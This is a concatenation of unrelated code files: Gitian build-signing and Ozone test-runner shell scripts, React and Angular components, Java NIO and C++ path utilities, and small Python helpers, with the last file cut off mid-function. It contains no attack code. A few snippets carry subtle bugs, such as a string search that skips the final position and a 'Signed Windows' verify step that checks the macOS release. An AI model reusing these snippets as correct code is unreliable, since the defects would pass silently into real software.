git add ${VERSION}-linux/${SIGNER}
git add ${VERSION}-aarch64/${SIGNER}
git add ${VERSION}-win-unsigned/${SIGNER}
git add ${VERSION}-osx-unsigned/${SIGNER}
git commit -a -m "Add ${VERSION} unsigned sigs for ${SIGNER}"
popd || exit
fi
fi
# Verify the build
if [[ $verify = true ]]
then
# Linux
pushd ./gitian-builder || exit
echo ""
echo "Verifying v${VERSION} Linux"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-linux ../netrum/contrib/gitian-descriptors/gitian-linux.yml
# Windows
echo ""
echo "Verifying v${VERSION} Windows"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-win-unsigned ../netrum/contrib/gitian-descriptors/gitian-win.yml
# Mac OSX
echo ""
echo "Verifying v${VERSION} Mac OSX"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-osx-unsigned ../netrum/contrib/gitian-descriptors/gitian-osx.yml
# AArch64
echo ""
echo "Verifying v${VERSION} AArch64"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-aarch64 ../netrum/contrib/gitian-descriptors/gitian-aarch64.yml
# Signed Windows
echo ""
echo "Verifying v${VERSION} Signed Windows"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-osx-signed ../netrum/contrib/gitian-descriptors/gitian-osx-signer.yml
# Signed Mac OSX
echo ""
echo "Verifying v${VERSION} Signed Mac OSX"
echo ""
./bin/gverify -v -d ../gitian.sigs/ -r ${VERSION}-osx-signed ../netrum/contrib/gitian-descriptors/gitian-osx-signer.yml
popd || exit
fi
# Sign binaries
if [[ $sign = true ]]
then
pushd ./gitian-builder || exit
# Sign Windows
if [[ $windows = true ]]
then
echo ""
echo "Signing ${VERSION} Windows"
echo ""
./bin/gbuild -i --commit signature=${COMMIT} ../netrum/contrib/gitian-descriptors/gitian-win-signer.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-win-signed --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-win-signer.yml
mv build/out/netrum-*win64-setup.exe ../netrum-binaries/${VERSION}
mv build/out/netrum-*win32-setup.exe ../netrum-binaries/${VERSION}
fi
# Sign Mac OSX
if [[ $osx = true ]]
then
echo ""
echo "Signing ${VERSION} Mac OSX"
echo ""
./bin/gbuild -i --commit signature=${COMMIT} ../netrum/contrib/gitian-descriptors/gitian-osx-signer.yml
./bin/gsign --signer $SIGNER --release ${VERSION}-osx-signed --destination ../gitian.sigs/ ../netrum/contrib/gitian-descriptors/gitian-osx-signer.yml
mv build/out/netrum-osx-signed.dmg ../netrum-binaries/${VERSION}/netrum-${VERSION}-osx.dmg
fi
popd || exit
if [[ $commitFiles = true ]]
then
# Commit Sigs
pushd gitian.sigs || exit
echo ""
echo "Committing ${VERSION} Signed Sigs"
echo ""
git add ${VERSION}-win-signed/${SIGNER}
git add ${VERSION}-osx-signed/${SIGNER}
git commit -a -m "Add ${VERSION} signed binary sigs for ${SIGNER}"
popd || exit
fi
fi
|
import React, { useRef, useEffect } from 'react'
import { withKnobs, optionsKnob, boolean } from '@storybook/addon-knobs'
import { Setup } from '../Setup'
import { TransformControls } from '../../src/TransformControls'
import { Box } from '../../src/shapes'
import { OrbitControls } from '../../src/OrbitControls'
export function TransformControlsStory() {
return (
<Setup>
<TransformControls>
<Box>
<meshBasicMaterial attach="material" wireframe />
</Box>
</TransformControls>
</Setup>
)
}
TransformControlsStory.storyName = 'Default'
export default {
title: 'Controls/TransformControls',
component: TransformControls,
}
function TransformControlsLockScene({ mode, showX, showY, showZ }) {
const orbitControls = useRef()
const transformControls = useRef()
useEffect(() => {
if (transformControls.current) {
const controls = transformControls.current
const callback = (event) => (orbitControls.current.enabled = !event.value)
controls.addEventListener('dragging-changed', callback)
return () => controls.removeEventListener('dragging-changed', callback)
}
})
return (
<>
<TransformControls ref={transformControls} mode={mode} showX={showX} showY={showY} showZ={showZ}>
<Box>
<meshBasicMaterial attach="material" wireframe />
</Box>
</TransformControls>
<OrbitControls ref={orbitControls} />
</>
)
}
export const TransformControlsLockSt = () => {
const modesObj = {
scale: 'scale',
rotate: 'rotate',
translate: 'translate',
}
return (
<TransformControlsLockScene
mode={optionsKnob('mode', modesObj, 'translate', {
display: 'radio',
})}
showX={boolean('showX', true)}
showY={boolean('showY', true)}
showZ={boolean('showZ', true)}
/>
)
}
TransformControlsLockSt.storyName = 'Lock orbit controls while transforming'
TransformControlsLockSt.decorators = [withKnobs, (storyFn) => <Setup controls={false}>{storyFn()}</Setup>]
|
#!/bin/bash
if test "$OS" = "Windows_NT"
then
# use .Net
.paket/paket.bootstrapper.exe
exit_code=$?
if [ $exit_code -ne 0 ]; then
exit $exit_code
fi
.paket/paket.exe restore
exit_code=$?
if [ $exit_code -ne 0 ]; then
exit $exit_code
fi
[ ! -e build.fsx ] && .paket/paket.exe update
packages/FAKE/tools/FAKE.exe $@ --fsiargs -d:MONO build.fsx
else
# use mono
mono .paket/paket.bootstrapper.exe
exit_code=$?
if [ $exit_code -ne 0 ]; then
exit $exit_code
fi
mono .paket/paket.exe restore
exit_code=$?
if [ $exit_code -ne 0 ]; then
exit $exit_code
fi
[ ! -e build.fsx ] && mono .paket/paket.exe update
mono packages/FAKE/tools/FAKE.exe $@ --fsiargs -d:MONO build.fsx
fi
|
<reponame>idrice24/mns
import { Injectable } from '@angular/core';
import { AppVideo, AppVideoItem } from '../models/app-video';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { Observable, of } from 'rxjs';
import { tap, catchError, filter, map } from 'rxjs/operators';
import { AppUser } from '../models/app-user';
import { LogService } from './log.service';
@Injectable({
providedIn: 'root'
})
export class VideoService {
private videosUrl = 'api/videos'; // URL to web api
httpOptions = {
headers: new HttpHeaders({ 'Content-Type': 'application/json' })
};
constructor(private httpClient: HttpClient, private logService: LogService) { }
/** GET: Videos from server */
getVideos(): Observable<AppVideo[]> {
return this.httpClient.get<AppVideo[]>(this.videosUrl).pipe(
tap(_ => this.log('fetched Videos ')),
catchError(this.handleError<AppVideo[]>('getVideos', []))
);
}
// REF: https://stackblitz.com/angular/kmxkdnbbppn?file=src%2Fapp%2Fheroes%2Fhero.service.ts
getVideoByYear(selectedYear: number) {
return this.getVideos().pipe(
map((vs: AppVideo[]) => vs.find(v => v.year === +selectedYear)));
}
/** PUT: update the Video on the server */
updateVideo(video: AppVideo): Observable<any> {
return this.httpClient.put(this.videosUrl, video, this.httpOptions).pipe(
tap(_ => this.log(`updated video id=${video.id}`)),
catchError(this.handleError<any>('updateVideo'))
);
}
/** Getter: get the comment */
getAppComment(): Observable<AppVideo[]> {
return this.httpClient.get<AppVideo[]>(this.videosUrl).pipe(
tap((commentList: AppVideo[]) => this.logService.log(commentList)),
catchError(this.handleError<AppVideo[]>('getAppComment', []))
);
}
/** CREATE : create the comment */
addAppComment(video: AppVideo): Observable<AppVideo> {
return this.httpClient.post<AppVideo>(this.videosUrl, video, this.httpOptions).pipe(
tap((newComment: AppVideo) => this.logService.log(`added Comment`)),
catchError(this.handleError<AppVideo>('addComment'))
);
}
/** CREATE : create the like */
addAppLike(like: number): Observable<AppVideo> {
return this.httpClient.post<AppVideo>(this.videosUrl, like, this.httpOptions).pipe(
tap((newLike: AppVideo) => this.logService.log(`added Like`)),
catchError(this.handleError<AppVideo>('addLike'))
);
}
/** POST: add a new video to the server */
addVideo(appVideo: AppVideo): Observable<AppVideo> {
return this.httpClient.post<AppVideo>(this.videosUrl, appVideo, this.httpOptions).pipe(
tap((newVideo: AppVideo) => this.log(`added Video w/ id=${newVideo.id}`)),
catchError(this.handleError<AppVideo>('addVideo'))
);
}
/**
* Handle Http operation that failed.
* Let the app continue.
* @param operation - name of the operation that failed
* @param result - optional value to return as the observable result
*/
private handleError<T>(operation = 'operation', result?: T) {
return (error: any): Observable<T> => {
console.error(error); // log to console instead
this.log(`${operation} failed: ${error.message}`);
return of(result as T);
};
}
/** Log a VideoService message with the MessageService */
private log(message: string) {
// this.messageService.add(`UserService: ${message}`);
console.warn(`UserService: ${message}`);
}
/** PUT: update the video on the server */
updateTopic(video: AppVideoItem): Observable<any> {
return this.httpClient.put(this.videosUrl, video, this.httpOptions).pipe(
tap(_ => this.log(`updated video id=${video.id}`)),
catchError(this.handleError<any>('updateVideo'))
);
}
}
|
if [ -z "$PYTHON" ]; then PYTHON=$(which python); fi
$PYTHON setup.py install # Python command to install the script.
|
#!/bin/bash
set -e
echo "Error: no test specified"
yarn lint
exit 0
|
class LastNElements:
def __init__(self, n):
self.n = n
self.elements = []
def push(self, element):
if len(self.elements) < self.n:
self.elements.append(element)
else:
# Shift the elements to the left
for i in range(len(self.elements)-1):
self.elements[i] = self.elements[i+1]
self.elements[-1] = element
def get_elements(self):
return self.elements |
/**
* Created by <EMAIL> on 2019/3/20.
*/
import "./style.less";
import React,{PureComponent} from 'react';
import {fromLu} from "youchain-utils";
import popup from "../../../../popup";
import Utils from "../../../../common/utils";
import {Button} from "../../../../components/vendors";
import Tab from "../../../../components/common/tab";
export default class Result extends PureComponent{
constructor(props){
super(props);
this.state = {
idx:0
};
this.onChangeTab = this.onChangeTab.bind(this);
}
onChangeTab(idx){
this.setState({
idx
});
}
render(){
const {locale,data:{gasPrice,gasLimit,data,value},onShowMsg,onSubmit,onShowGas} = this.props;
const {app:{usd},account} = this.props.state;
const currentAccount = account.list[account.current];
const {idx} = this.state;
const tabs = [
{
title:locale.deploy_detail
},
{
title:locale.deploy_data
}
];
const balance = Utils.formatAccuracy(currentAccount.balance || 0);
console.log("gasPrice: ", gasPrice);
console.log("gasLimit: ", gasLimit);
const gas = fromLu((gasPrice * gasLimit).toString(),"you");
const used = gas + (value ? value : 0);
return (
<div className="content-common-wrapper deploy-result-wrapper">
<Tab
data={tabs}
onChange={this.onChangeTab}
defaultIdx={idx}
/>
{
idx === 0 ?
<section className="detail-region">
<div>
<section>{locale.from}</section>
<section>
<h4 className="overflow">
{currentAccount.name}
<small>({balance.toFixed(4)} YOU)</small>
</h4>
<small className="address">{Utils.formatAddress(currentAccount.address,false)}</small>
</section>
</div>
{
value && Math.abs(value) > 0 ?
<div>
<section>{locale.count}</section>
<section>
<h4>{value} YOU</h4>
<small>{Utils.formatUsd(usd,value,7)} USD</small>
</section>
</div> : null
}
<div>
<section>{locale.gas}</section>
<section>
<h4>{gas} YOU</h4>
<small>{Utils.formatUsd(usd,gas,7)} USD</small>
</section>
</div>
<div>
<a onClick={()=>{
onShowGas && onShowGas();
}}>{locale.advanced_options}</a>
</div>
</section> : null
}
{
idx === 1 ?
<section className="data-region">
<p>{locale.deploy_data_title}</p>
<div>
{
data
}
</div>
</section> : null
}
<section className="actions-region">
<Button
text={locale.cancel}
type={"default"}
block={true}
onClick={()=>{
popup.messageToContent({
method:"close"
});
}}
/>
<Button
text={locale.confirm}
block={true}
onClick={()=>{
if(balance - used < 0){
onShowMsg && onShowMsg(locale.insufficient_funds,"info");
}
else{
onSubmit && onSubmit();
}
}}
/>
</section>
</div>
)
}
} |
<reponame>JustinDFuller/purchase-saving-planner
import * as Auth from "auth";
import * as Notifications from "notifications";
import * as Purchase from "purchase";
import * as Layout from "layout";
import * as data from "../data";
export const List = Auth.context.With(function ({ auth }) {
const { user } = data.Use();
return (
<div className="row m-auto pt-4">
<div className="col col-12">
{auth.isLoggedIn() && !user.purchases().hasAtLeastOne() ? (
<Layout.components.HowItWorks />
) : (
<Purchase.components.List loading={auth.isLoggingIn()} />
)}
</div>
<Notifications.components.Toasts />
</div>
);
});
List.path = "/app/user/list";
|
const express = require('express');
const graphqlHTTP = require('express-graphql');
const { buildSchema } = require('graphql');
const book_list = [
{
title: 'Alice in Wonderland',
author: 'Lewis Carroll',
},
{
title: 'The Hobbit',
author: 'J.R.R. Tolkien',
},
{
title: 'Pride and Prejudice',
author: 'Jane Austen',
},
];
// Construct a schema, using GraphQL schema language
const schema = buildSchema(`
type Book {
title: String
author: String
}
type Query {
allBooks: [Book]
findByTitle(title: String): [Book]
findByAuthor(author: String): [Book]
}
`);
// The root provides the top-level API endpoints
const rootValue = {
allBooks: () => book_list,
findByTitle: ({ title }) => book_list.filter((book) => book.title === title),
findByAuthor: ({ author }) =>
book_list.filter((book) => book.author === author),
};
const app = express();
// Setup the GraphQL endpoint
app.use(
'/graphql',
graphqlHTTP({
schema,
rootValue,
graphiql: true,
})
);
const PORT = 4000;
app.listen(PORT, () => {
console.log(`GraphQL API listening on port ${PORT}!`);
}); |
import makeGamesRepository from 'shared/domain/repositories/factories/makeGamesRepository';
import GetGameDetailsService from '../GetGameDetailsService';
export default function makeGetGameDetailsService(): GetGameDetailsService {
const gamesRepository = makeGamesRepository();
const getGameDetails = new GetGameDetailsService(gamesRepository);
return getGameDetails;
}
|
def stringSearch(text, string):
currIndex = 0
textLen = len(text)
stringLen = len(string)
for i in range(textLen - stringLen):
foundMatch = True
for j in range(stringLen):
if text[i+j] != string[j]:
foundMatch = False
break
if foundMatch:
currIndex = i
break
return currIndex |
#!/bin/bash
if [[ "$1" ]]; then
echo "Removing container tno-$1"
docker rm -f tno-$1
docker image rm -f tno:$1
fi
|
<gh_stars>1-10
package com.linwei.annotation;
import androidx.appcompat.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.TextView;
import android.widget.Toast;
import com.linwei.annotation.utils.AnnotationUtils;
public class ThreeActivity extends AppCompatActivity {
@BindView(R.id.mTvTitle)
public TextView mTvTitle;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_three);
AnnotationUtils.bind(this);
}
@OnClick({R.id.mBtSubmit})
public void onClick(View view){
if(view.getId()==R.id.mBtSubmit){
Toast.makeText(this,"点击了",Toast.LENGTH_SHORT).show();
}
}
}
|
#!/usr/bin/env bash
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -e
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )"
RESULT_DIR=result
#delete previous results
rm -rf "${DIR:?}/$RESULT_DIR"
mkdir -p "$DIR/$RESULT_DIR"
#Should be writeable from the docker containers where user is different.
chmod ogu+w "$DIR/$RESULT_DIR"
## @description wait until 3 datanodes are up (or 30 seconds)
## @param the docker-compose file
wait_for_datanodes(){
#Reset the timer
SECONDS=0
#Don't give it up until 30 seconds
while [[ $SECONDS -lt 30 ]]; do
#This line checks the number of HEALTHY datanodes registered in scm over the
# jmx HTTP servlet
datanodes=$(docker-compose -f "$1" exec -T scm curl -s 'http://localhost:9876/jmx?qry=Hadoop:service=SCMNodeManager,name=SCMNodeManagerInfo' | jq -r '.beans[0].NodeCount[] | select(.key=="HEALTHY") | .value')
if [[ "$datanodes" == "3" ]]; then
#It's up and running. Let's return from the function.
echo "$datanodes datanodes are up and registered to the scm"
return
else
#Print it only if a number. Could be not a number if scm is not yet started
if [[ "$datanodes" ]]; then
echo "$datanodes datanode is up and healhty (until now)"
fi
fi
sleep 2
done
echo "WARNING! Datanodes are not started successfully. Please check the docker-compose files"
}
## @description Execute selected test suites in a specified docker-compose engironment
## @param the name of the docker-compose env relative to ../compose
## @param the name of the tests (array of subdir names of the dir of this script)
execute_tests(){
COMPOSE_DIR=$1
COMPOSE_FILE=$DIR/../compose/$COMPOSE_DIR/docker-compose.yaml
TESTS=$2
echo "-------------------------------------------------"
echo "Executing test(s): [${TESTS[*]}]"
echo ""
echo " Cluster type: $COMPOSE_DIR"
echo " Compose file: $COMPOSE_FILE"
echo " Output dir: $DIR/$RESULT_DIR"
echo " Command to rerun: ./test.sh --keep --env $COMPOSE_DIR $TESTS"
echo "-------------------------------------------------"
docker-compose -f "$COMPOSE_FILE" down
docker-compose -f "$COMPOSE_FILE" up -d --scale datanode=3
wait_for_datanodes "$COMPOSE_FILE"
#TODO: we need to wait for the OM here
sleep 10
for TEST in "${TESTS[@]}"; do
TITLE="Ozone $TEST tests with $COMPOSE_DIR cluster"
set +e
OUTPUT_NAME="$COMPOSE_DIR-${TEST//\//_}"
docker-compose -f "$COMPOSE_FILE" exec -T ozoneManager python -m robot --log NONE --report NONE "${OZONE_ROBOT_OPTS[@]}" --output "smoketest/$RESULT_DIR/robot-$OUTPUT_NAME.xml" --logtitle "$TITLE" --reporttitle "$TITLE" "smoketest/$TEST"
set -e
docker-compose -f "$COMPOSE_FILE" logs > "$DIR/$RESULT_DIR/docker-$OUTPUT_NAME.log"
done
if [ "$KEEP_RUNNING" = false ]; then
docker-compose -f "$COMPOSE_FILE" down
fi
}
RUN_ALL=true
KEEP_RUNNING=false
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
--env)
DOCKERENV="$2"
RUN_ALL=false
shift # past argument
shift # past value
;;
--keep)
KEEP_RUNNING=true
shift # past argument
;;
--help|-h|-help)
cat << EOF
Acceptance test executor for ozone.
This is a lightweight test executor for ozone.
You can run it with
./test.sh
Which executes all the tests in all the available environments.
Or you can run manually one test with
./test.sh --keep --env ozone-hdfs basic
--keep means that docker cluster won't be stopped after the test (optional)
--env defines the subdirectory under the compose dir
The remaining parameters define the test suites under smoketest dir.
Could be any directory or robot file relative to the smoketest dir.
EOF
exit 0
;;
*)
POSITIONAL+=("$1") # save it in an array for later
shift # past argument
;;
esac
done
if [ "$RUN_ALL" = true ]; then
#
# This is the definition of the ozone acceptance test suite
#
# We select the test suites and execute them on multiple type of clusters
#
TESTS=("basic")
execute_tests ozone "${TESTS[@]}"
TESTS=("auditparser")
execute_tests ozone "${TESTS[@]}"
TESTS=("ozonefs")
execute_tests ozonefs "${TESTS[@]}"
TESTS=("basic")
execute_tests ozone-hdfs "${TESTS[@]}"
TESTS=("s3")
execute_tests ozones3 "${TESTS[@]}"
else
execute_tests "$DOCKERENV" "${POSITIONAL[@]}"
fi
#Generate the combined output and return with the right exit code (note: robot = execute test, rebot = generate output)
docker run --rm -v "$DIR/..:/opt/hadoop" apache/hadoop-runner rebot -d "smoketest/$RESULT_DIR" "smoketest/$RESULT_DIR/robot-*.xml"
|
<reponame>giorgiofederici/giorgiofederici-frontend
import { Action } from '@ngrx/store';
export enum LogoutActionTypes {
Logout = '[Logout] Logout',
LogoutConfirmation = '[Logout] Logout Confirmation',
LogoutConfirmationDismiss = '[Logout] Logout Confirmation Dismiss'
}
export class Logout implements Action {
readonly type = LogoutActionTypes.Logout;
}
export class LogoutConfirmation implements Action {
readonly type = LogoutActionTypes.LogoutConfirmation;
}
export class LogoutConfirmationDismiss implements Action {
readonly type = LogoutActionTypes.LogoutConfirmationDismiss;
}
export type LogoutActionsUnion =
| Logout
| LogoutConfirmation
| LogoutConfirmationDismiss;
|
import json
def serialize_dict(input_dict):
return json.dumps(input_dict) |
python google_takeout.py --youtube_archive_dir /media/philippe/DATA/google-takeout/Takeout\ 2 --output_dir /media/philippe/DATA/google-takeout/mp3-takout --download_watch_history
python google_takeout.py --youtube_archive_dir /media/philippe/DATA/google-takeout/Takeout --output_dir /media/philippe/DATA/google-takeout/mp3-takout --download_watch_history
python filter_lengthy_songs.py --input_dir /media/philippe/DATA/google-takeout/mp3-takout --output_dir /media/philippe/DATA/google-takeout/mp3-takout-2 --force --min_minutes 0 --max_minutes 8 --dry_run > out.txt
|
import datetime
highlightsPosted = []
def add_highlight(row):
now = str(datetime.datetime.now()) # Get the current timestamp
formatted_row = row + [now] # Format the row with the current timestamp
highlightsPosted.append(formatted_row) # Append the formatted row to the highlightsPosted database
return formatted_row # Return the formatted row |
<filename>ods-base-support/ods-system/src/main/java/cn/stylefeng/guns/sys/modular/log/param/SysOpLogParam.java
/*
Copyright [2020] [https://www.stylefeng.cn]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Guns采用APACHE LICENSE 2.0开源协议,您在使用过程中,需要注意以下几点:
1.请不要删除和修改根目录下的LICENSE文件。
2.请不要删除和修改Guns源码头部的版权声明。
3.请保留源码和相关描述文件的项目出处,作者声明等。
4.分发源码时候,请注明软件出处 https://gitee.com/stylefeng/guns-separation
5.在修改包名,模块名称,项目代码等时,请注明软件出处 https://gitee.com/stylefeng/guns-separation
6.若您的项目无法满足以上几点,可申请商业授权,获取Guns商业授权许可,请在官网购买授权,地址为 https://www.stylefeng.cn
*/
package cn.stylefeng.guns.sys.modular.log.param;
import cn.stylefeng.guns.core.pojo.base.param.BaseParam;
import java.util.Date;
import java.util.Objects;
/**
* 操作日志参数
*
* @author xuyuxiang
* @date 2020/3/26 9:16
*/
public class SysOpLogParam extends BaseParam {
/**
* 主键
*/
private Long id;
/**
* 名称
*/
private String name;
/**
* 操作类型(0其他 1增加 2删除 3编辑 ...见BasePram的参数校验类型)
*/
private Integer opType;
/**
* 是否执行成功(Y-是,N-否)
*/
private String success;
/**
* 具体消息
*/
private String message;
/**
* ip
*/
private String ip;
/**
* 地址
*/
private String location;
/**
* 浏览器
*/
private String browser;
/**
* 操作系统
*/
private String os;
/**
* 请求地址
*/
private String url;
/**
* 类名称
*/
private String className;
/**
* 方法名称
*/
private String methodName;
/**
* 请求方式(GET POST PUT DELETE)
*/
private String reqMethod;
/**
* 请求参数
*/
private String param;
/**
* 返回结果
*/
private String result;
/**
* 操作时间
*/
private Date opTime;
/**
* 操作人
*/
private String account;
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public Integer getOpType() {
return opType;
}
public void setOpType(Integer opType) {
this.opType = opType;
}
public String getSuccess() {
return success;
}
public void setSuccess(String success) {
this.success = success;
}
public String getMessage() {
return message;
}
public void setMessage(String message) {
this.message = message;
}
public String getIp() {
return ip;
}
public void setIp(String ip) {
this.ip = ip;
}
public String getLocation() {
return location;
}
public void setLocation(String location) {
this.location = location;
}
public String getBrowser() {
return browser;
}
public void setBrowser(String browser) {
this.browser = browser;
}
public String getOs() {
return os;
}
public void setOs(String os) {
this.os = os;
}
public String getUrl() {
return url;
}
public void setUrl(String url) {
this.url = url;
}
public String getClassName() {
return className;
}
public void setClassName(String className) {
this.className = className;
}
public String getMethodName() {
return methodName;
}
public void setMethodName(String methodName) {
this.methodName = methodName;
}
public String getReqMethod() {
return reqMethod;
}
public void setReqMethod(String reqMethod) {
this.reqMethod = reqMethod;
}
public String getParam() {
return param;
}
public void setParam(String param) {
this.param = param;
}
public String getResult() {
return result;
}
public void setResult(String result) {
this.result = result;
}
public Date getOpTime() {
return opTime;
}
public void setOpTime(Date opTime) {
this.opTime = opTime;
}
public String getAccount() {
return account;
}
public void setAccount(String account) {
this.account = account;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
if (!super.equals(o)) return false;
SysOpLogParam that = (SysOpLogParam) o;
return Objects.equals(id, that.id) &&
Objects.equals(name, that.name) &&
Objects.equals(opType, that.opType) &&
Objects.equals(success, that.success) &&
Objects.equals(message, that.message) &&
Objects.equals(ip, that.ip) &&
Objects.equals(location, that.location) &&
Objects.equals(browser, that.browser) &&
Objects.equals(os, that.os) &&
Objects.equals(url, that.url) &&
Objects.equals(className, that.className) &&
Objects.equals(methodName, that.methodName) &&
Objects.equals(reqMethod, that.reqMethod) &&
Objects.equals(param, that.param) &&
Objects.equals(result, that.result) &&
Objects.equals(opTime, that.opTime) &&
Objects.equals(account, that.account);
}
@Override
public int hashCode() {
return Objects.hash(super.hashCode(), id, name, opType, success, message, ip, location, browser, os, url, className, methodName, reqMethod, param, result, opTime, account);
}
}
|
gem install xcpretty --no-ri --no-rdoc
export PYTHONUSERBASE=~/.local
easy_install --user scan-build
export PATH="${HOME}/.local/bin:${PATH}"
set -o pipefail && scan-build --status-bugs --use-analyzer Xcode xcodebuild analyze -workspace Stripe.xcworkspace -scheme "StripeiOS" -configuration Debug -sdk iphonesimulator ONLY_ACTIVE_ARCH=NO | xcpretty
|
#!/bin/bash
# This script relies upon the following environment variables:
# OS_AUTH_URL = Specifies the URL for authentication
# OS_USERNAME = Specifies the username for authentication
# OS_PASSWORD = Specifies the password for authentication
# OS_TENANT_NAME = Specifies the name of the tenant Docker Machine will use
# Define the Swarm token (must be re-generated every time this is re-run)
SWARM_TOKEN="593313abdb6a669f7e84892b8c4d7a84"
# Define some values used later
OS_IMAGE_ID="eed0ae16-948a-4930-97ab-f7ba128385a8"
OS_NETWORK_NAME="demo-net"
OS_SSH_USER="ubuntu"
OS_FLOATINGIP_POOL="ext-net-5"
# Create the node-02 instance
docker-machine create -d openstack \
--openstack-flavor-id 3 \
--openstack-image-id $OS_IMAGE_ID \
--openstack-net-name $OS_NETWORK_NAME \
--openstack-floatingip-pool $OS_FLOATINGIP_POOL \
--openstack-ssh-user $OS_SSH_USER \
--openstack-sec-groups docker,basic-services \
--swarm \
--swarm-discovery token://$SWARM_TOKEN \
node-02 |
package com.abner.playground.nio;
import java.io.IOException;
import java.io.RandomAccessFile;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;
public class FileChannelTest {
public static void main(String[] args) throws IOException {
RandomAccessFile accessFile = new RandomAccessFile("c:/tmp/123.txt", "rw");
FileChannel fileChannel = accessFile.getChannel();
ByteBuffer buffer = ByteBuffer.allocate(2048);//2048 byte的数组缓冲区
int byteLength = fileChannel.read(buffer);
System.out.println("byte length : " + byteLength);
while(byteLength != -1) {
buffer.flip();
while(buffer.hasRemaining()){
System.out.println((char)buffer.get());
}
buffer.compact();
byteLength = fileChannel.read(buffer);
}
}
}
|
#!/bin/bash
python RunSimulation.py --Geo 10.0 --sim_num 88
|
<gh_stars>1-10
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.trash = void 0;
var trash = {
"viewBox": "0 0 1408 1792",
"children": [{
"name": "path",
"attribs": {
"d": "M512 1376v-704q0-14-9-23t-23-9h-64q-14 0-23 9t-9 23v704q0 14 9 23t23 9h64q14 0 23-9t9-23zM768 1376v-704q0-14-9-23t-23-9h-64q-14 0-23 9t-9 23v704q0 14 9 23t23 9h64q14 0 23-9t9-23zM1024 1376v-704q0-14-9-23t-23-9h-64q-14 0-23 9t-9 23v704q0 14 9 23t23 9h64q14 0 23-9t9-23zM480 384h448l-48-117q-7-9-17-11h-317q-10 2-17 11zM1408 416v64q0 14-9 23t-23 9h-96v948q0 83-47 143.5t-113 60.5h-832q-66 0-113-58.5t-47-141.5v-952h-96q-14 0-23-9t-9-23v-64q0-14 9-23t23-9h309l70-167q15-37 54-63t79-26h320q40 0 79 26t54 63l70 167h309q14 0 23 9t9 23z"
}
}]
};
exports.trash = trash; |
#include "glass/utils/path.h"
#ifdef USE_QT
#include <QString>
#include <QFileInfo>
#endif
using namespace std;
void path::format(string& filename)
{
if(filename.empty())
{
filename = ".";
}
for(auto it = filename.begin(); it != filename.end();)
{
if(*it == '\\')
{
*it = '/';
}
if(it != filename.begin() && *(it-1) == '/' && *it == '/')
{
it = filename.erase(it);
}
else
{
it++;
}
}
// if(filename[0] != '.' && filename[0] != '/' && filename[1] != ':')
// {
// filename = string("./") + filename;
// }
}
vector<string> path::ls(string folder_name)
{
path::format(folder_name);
if(folder_name[folder_name.size()-1] == '/')
{
folder_name.erase(folder_name.size()-1, 1);
}
vector<string> filenames;
struct stat s;
stat(folder_name.c_str(), &s);
if(!S_ISDIR(s.st_mode))
{
return filenames;
}
DIR* open_dir = opendir(folder_name.c_str());
if(NULL == open_dir)
{
exit(EXIT_FAILURE);
}
dirent* p = nullptr;
while( (p = readdir(open_dir)) != nullptr)
{
if(p->d_name[0] != '.')
{
if(folder_name != ".")
filenames.push_back(folder_name + "/" + string(p->d_name));
else
filenames.push_back(string(p->d_name));
}
}
closedir(open_dir);
return filenames;
}
int path::cd(string dir_name)
{
path::format(dir_name);
return chdir(dir_name.data());
}
string path::cd()
{
char path[1024];
getcwd(path, 1024);
string str_path = string(path);
format(str_path);
return str_path;
}
string path::pwd()
{
char path[1024];
getcwd(path, 1024);
string str_path = string(path);
format(str_path);
return str_path;
}
bool path::isfile(string filename)
{
path::format(filename);
if(filename[filename.size()-1] == '/')
{
return false;
}
struct stat s;
return (stat(filename.c_str(), &s) == 0 && (s.st_mode & S_IFREG));
}
bool path::isdir(string folder_name)
{
path::format(folder_name);
struct stat s;
return (stat(folder_name.c_str(), &s) == 0 && (s.st_mode & S_IFDIR));
}
bool path::exists(string name)
{
path::format(name);
struct stat s;
return (stat(name.c_str(), &s) == 0);
}
int path::mkdir(string folder_name)
{
path::format(folder_name);
if(folder_name[folder_name.size()-1] == '/')
{
folder_name.erase(folder_name.size()-1, 1);
}
stack<string> S;
int n = folder_name.size();
int i = n;
while(true)
{
if(i == n || folder_name[i] == '/' || folder_name[i] == '\\')
{
string current_name = folder_name.substr(0, i);
if(isdir(current_name))
{
break;
}
else
{
S.push(current_name);
}
}
i--;
if(i == 0)
{
break;
}
}
if(S.empty())
{
return 1;
}
while(!S.empty())
{
int flag;
#ifdef __linux__
flag = ::mkdir(S.top().c_str(), 0755);
#else
flag = ::mkdir(S.top().c_str());
#endif
if(flag != 0)
{
